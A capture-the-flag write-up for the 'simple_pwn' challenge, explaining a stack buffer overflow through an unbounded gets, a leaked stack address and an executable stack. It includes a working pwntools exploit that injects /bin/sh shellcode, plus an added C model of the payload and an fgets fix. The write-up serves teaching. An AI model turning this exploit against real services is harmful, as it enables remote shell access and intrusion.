# [PWNABLE] Simple Pwn

:::warning
Copyright ⓒ 2021 by CSTEC. Contents may not be copied without permission.
:::

## Analysis

The program is small: all of its functionality lives in `main`.

```
❯ rabin2 -I simple_pwn
arch     x86
baddr    0x400000
binsz    6613
bintype  elf
bits     64
canary   false
class    ELF64
compiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crypto   false
endian   little
havecode true
intrp    /lib64/ld-linux-x86-64.so.2
laddr    0x0
lang     c
linenum  true
lsyms    true
machine  AMD x86-64 architecture
maxopsz  16
minopsz  1
nx       false
os       linux
pcalign  0
pic      false
relocs   true
relro    partial
rpath    NONE
sanitiz  false
static   false
stripped false
subsys   linux
va       true
```

NX (no-execute) is disabled, so the stack is executable: bytes written into a stack buffer can later be run as code. There is also no stack canary (`canary false`) to detect a smashed frame, and the binary is not position independent (`pic false`, fixed base `0x400000`).

## Vulnerability

```asm
.text:0000000000400637 ; Attributes: bp-based frame
.text:0000000000400637 ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:0000000000400637                 public main
.text:0000000000400637 main            proc near
.text:0000000000400637 var_80          = byte ptr -80h
.text:0000000000400637 ; __unwind {
.text:0000000000400637 000 55                          push    rbp
.text:0000000000400638 008 48 89 E5                    mov     rbp, rsp
.text:000000000040063B 008 48 83 C4 80                 add     rsp, 0FFFFFFFFFFFFFF80h
.text:000000000040063F 088 48 8D 55 80                 lea     rdx, [rbp+var_80]
.text:0000000000400643 088 B8 00 00 00 00              mov     eax, 0
.text:0000000000400648 088 B9 10 00 00 00              mov     ecx, 10h
.text:000000000040064D 088 48 89 D7                    mov     rdi, rdx
.text:0000000000400650 088 F3 48 AB                    rep stosq
.text:0000000000400653 088 48 8B 05 F6 09 20 00        mov     rax, cs:stdout@@GLIBC_2_2_5
.text:000000000040065A 088 B9 00 00 00 00              mov     ecx, 0          ; n
.text:000000000040065F 088 BA 02 00 00 00              mov     edx, 2          ; modes
.text:0000000000400664 088 BE 00 00 00 00              mov     esi, 0          ; buf
.text:0000000000400669 088 48 89 C7                    mov     rdi, rax        ; stream
.text:000000000040066C 088 E8 CF FE FF FF              call    _setvbuf
.text:0000000000400671 088 48 8B 05 E8 09 20 00        mov     rax, cs:stdin@@GLIBC_2_2_5
.text:0000000000400678 088 B9 00 00 00 00              mov     ecx, 0          ; n
.text:000000000040067D 088 BA 02 00 00 00              mov     edx, 2          ; modes
.text:0000000000400682 088 BE 00 00 00 00              mov     esi, 0          ; buf
.text:0000000000400687 088 48 89 C7                    mov     rdi, rax        ; stream
.text:000000000040068A 088 E8 B1 FE FF FF              call    _setvbuf
.text:000000000040068F 088 48 8D 3D BE 00 00 00        lea     rdi, s          ; "Welcome."
.text:0000000000400696 088 E8 75 FE FF FF              call    _puts
.text:000000000040069B 088 48 8D 45 80                 lea     rax, [rbp+var_80]
.text:000000000040069F 088 48 89 C6                    mov     rsi, rax
.text:00000000004006A2 088 48 8D 3D B4 00 00 00        lea     rdi, format     ; "This will help you : %p\n"
.text:00000000004006A9 088 B8 00 00 00 00              mov     eax, 0
.text:00000000004006AE 088 E8 6D FE FF FF              call    _printf
.text:00000000004006B3 088 48 8D 45 80                 lea     rax, [rbp+var_80]
.text:00000000004006B7 088 48 89 C7                    mov     rdi, rax
.text:00000000004006BA 088 B8 00 00 00 00              mov     eax, 0
.text:00000000004006BF 088 E8 6C FE FF FF              call    _gets
.text:00000000004006C4 088 B8 00 00 00 00              mov     eax, 0
.text:00000000004006C9 088 C9                          leave
.text:00000000004006CA 000 C3                          retn
.text:00000000004006CA ; } // starts at 400637
.text:00000000004006CA main            endp
```

`main` reserves a 0x80-byte buffer (`var_80` at `rbp-0x80`), zeroes it with `rep stosq` (16 qwords), disables stdio buffering, and then hands the buffer's address to the attacker through `printf("This will help you : %p\n", buf)`. This leaks the stack address, so ASLR on the stack is no obstacle. The `gets` call at `0x4006BF` then reads a line into that buffer with no length check: `gets` stops only at a newline or EOF, so any input longer than 0x80 bytes is a stack-based buffer overflow that first overwrites the saved `rbp` at `rbp` and then the return address at `rbp+8`.

## Exploit

```python
from pwn import *

io = remote('0', 9696)

# Line 1 is "Welcome.", line 2 is "This will help you : 0x7ffd...".
# The last 14 characters are "0x" plus the 12 hex digits of a 0x7f.. stack address.
data = io.recvlines(2)
stack = int(data[1][-14:], 16)   # address of var_80, i.e. where our input lands

shellcode = asm(shellcraft.amd64.sh(), arch='amd64')

# 0x80 bytes fill the buffer: NOP sled, shellcode, then 0x20 bytes of NOPs.
payload = b'\x90' * (0x80 - len(shellcode) - 0x20)
payload += shellcode
payload += b'\x90' * 0x20
# 8 bytes overwrite the saved rbp (SFP), the next 8 the return address.
payload += b'b' * 8 + p64(stack)

io.sendline(payload)
io.interactive()
```

The buffer is 0x80 bytes, so the 8 bytes that follow it overwrite the saved frame pointer (SFP) and the 8 bytes after that overwrite `main`'s return address. Pointing that return address at the leaked buffer address makes `retn` land on the NOP sled, which slides into the shellcode. The 0x20 bytes of NOPs left after the shellcode are not padding for its own sake: when `retn` executes, `rsp` sits just above the overwritten return address, and the pushes the shellcode makes to build its `"/bin/sh"` string and argument array grow downward from there, so the gap keeps those pushes from overwriting the code that is still running.
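To make the frame layout and the payload arithmetic concrete, the following is an added example written for this page; it is not code from the original write-up or from the challenge binary. It models `main`'s frame as reconstructed from the disassembly above (a 0x80-byte buffer followed by the saved `rbp` and the return address), builds the same payload layout the exploit uses, parses the leaked address more robustly than a fixed `[-14:]` slice, and shows the bounded `fgets` read that would have closed the bug. The names (`struct frame`, `build_payload`, `apply_overflow`, `read_line_bounded`), the two-byte placeholder "shellcode" and the sample leak line are all constructed for this example and are assumptions; the host is assumed to be little-endian x86-64, like the target.

```c
/* Added example: model of the simple_pwn stack frame and exploit payload.
 * Not part of the original write-up; names and sample data are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE    0x80u                 /* var_80: 16 qwords zeroed by rep stosq */
#define PAYLOAD_LEN (BUF_SIZE + 8 + 8)    /* buffer + saved rbp + return address    */
#define SC_PAD      0x20u                 /* NOPs left free for the shellcode's pushes */

/* Layout at [rbp-0x80]: the buffer, then the rbp saved by "push rbp",
 * then the return address pushed by the "call main" in __libc_start_main. */
struct frame {
    uint8_t  buf[BUF_SIZE];
    uint64_t saved_rbp;   /* SFP: the exploit fills this with 'bbbbbbbb' */
    uint64_t ret;         /* the exploit points this at buf itself      */
};

/* Parse the pointer out of "This will help you : 0x7ffd12345678".
 * Works for any number of hex digits; returns 0 on success, -1 otherwise. */
static int parse_leak(const char *line, uint64_t *out)
{
    const char *colon = strrchr(line, ':');
    if (colon == NULL) return -1;
    char *end;
    unsigned long long v = strtoull(colon + 1, &end, 16);  /* accepts the 0x prefix */
    if (end == colon + 1) return -1;                       /* no hex digits found   */
    *out = (uint64_t)v;
    return 0;
}

/* Same layout as the exploit: NOP sled, shellcode ending at buf+0x60, 0x20 NOPs,
 * 8 bytes of fake SFP, then the return address (little-endian, like p64()).
 * Returns the payload length, or 0 if the shellcode does not fit. */
static size_t build_payload(uint8_t *out, const uint8_t *sc, size_t sc_len, uint64_t buf_addr)
{
    if (sc_len + SC_PAD > BUF_SIZE) return 0;
    size_t sled = BUF_SIZE - sc_len - SC_PAD;
    memset(out, 0x90, BUF_SIZE);                 /* sled and trailing pad are NOPs */
    memcpy(out + sled, sc, sc_len);
    memset(out + BUF_SIZE, 'b', 8);              /* saved rbp: any value will do  */
    memcpy(out + BUF_SIZE + 8, &buf_addr, 8);    /* return address = start of buf */
    return PAYLOAD_LEN;
}

/* Model of gets(): store n bytes starting at buf with no bound check.
 * Returns how many bytes spilled past buf into saved_rbp and ret. */
static size_t apply_overflow(struct frame *f, const uint8_t *payload, size_t n)
{
    if (n > sizeof *f) n = sizeof *f;            /* keep the model inside the struct */
    memcpy((uint8_t *)f, payload, n);
    return n > BUF_SIZE ? n - BUF_SIZE : 0;
}

/* The fix: fgets() bounded by the buffer size, newline stripped.
 * Returns the number of bytes stored; a long line is cut at size-1 bytes. */
static size_t read_line_bounded(FILE *in, char *buf, size_t size)
{
    if (fgets(buf, (int)size, in) == NULL) return 0;
    size_t len = strcspn(buf, "\n");
    buf[len] = '\0';
    return len;
}

/* Feed a constructed 200-byte line through the bounded reader. */
static size_t demo_bounded_read(void)
{
    FILE *in = tmpfile();
    if (in == NULL) return 0;
    for (int i = 0; i < 200; i++) fputc('A', in);
    fputc('\n', in);
    rewind(in);
    char buf[BUF_SIZE];
    size_t len = read_line_bounded(in, buf, sizeof buf);
    fclose(in);
    return len;                                  /* 0x7f: the overflow is gone */
}

int main(void)
{
    uint64_t leak;
    if (parse_leak("This will help you : 0x7ffd12345678", &leak) != 0) return 1;
    static const uint8_t sc[] = { 0x0f, 0x05 };  /* placeholder bytes, not a real shellcode */
    uint8_t payload[PAYLOAD_LEN];
    build_payload(payload, sc, sizeof sc, leak);
    struct frame f;
    memset(&f, 0, sizeof f);
    size_t spilled = apply_overflow(&f, payload, PAYLOAD_LEN);
    printf("spilled %zu bytes; ret = 0x%llx; bounded read stored %zu bytes\n",
           spilled, (unsigned long long)f.ret, demo_bounded_read());
    return 0;
}
```

Running it shows the two facts the exploit relies on: exactly 0x10 bytes spill past the buffer, and the last 8 of them land in `ret`, which now holds the leaked buffer address. Swapping the `gets` for `read_line_bounded` keeps the same program behaviour for normal input while making the spill impossible.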